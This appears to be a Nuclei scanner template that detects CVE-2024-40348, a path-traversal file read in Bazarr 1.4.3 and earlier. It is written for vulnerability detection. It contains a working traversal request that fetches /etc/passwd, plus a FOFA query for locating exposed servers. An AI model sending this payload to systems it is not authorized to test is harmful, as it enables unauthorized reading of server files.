id: CVE-2024-40348 info: name: Bazarr < 1.4.3 - Arbitrary File Read author: s4e-io severity: high description: | Bazarr 1.4.3 and earlier versions have a arbitrary file read vulnerability. impact: | Unauthenticated attackers can read arbitrary files from the Bazarr server via path traversal. remediation: | Update Bazarr to version 1.4.4 or later. reference: - https://github.com/4rdr/proofs/blob/main/info/Bazaar_1.4.3_File_Traversal_via_Filename.md - https://www.bazarr.media/ - https://github.com/bigb0x/CVE-2024-40348 classification: cve-id: CVE-2024-40348 cwe-id: CWE-22 cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:L cvss-score: 8.2 epss-score: 0.93379 epss-percentile: 0.99824 cpe: cpe:2.3:a:bazarr:bazarr:*:*:*:*:*:*:*:* metadata: verified: true max-request: 2 vendor: morpheus65535 product: bazarr fofa-query: title=="Bazarr" && icon_hash="-1983413099" tags: cve,cve2024,bazarr,lfi,vuln flow: http(1) && http(2) http: - method: GET path: - "{{BaseURL}}/login" matchers: - type: word part: body words: - "Bazarr" - 'content="Bazarr' - "window.Bazarr" condition: or internal: true - method: GET path: - "{{BaseURL}}/api/swaggerui/static/../../../../../../../../../../../../../../../../etc/passwd" matchers-condition: and matchers: - type: regex part: body regex: - "root:.*:0:0:" - type: word part: header words: - "application/octet-stream" - type: status status: - 200 # digest: 4a0a00473045022100f9e3e6015da549319405ab077567b2312b9a3fedd0bc1acca2b797a3f7952d6602200d0ff64928090bce500f2ef49d37a0765fb1257a68198fb0ab6c24acdfdeb7c7:922c64590222798bb761d5b6d8e72950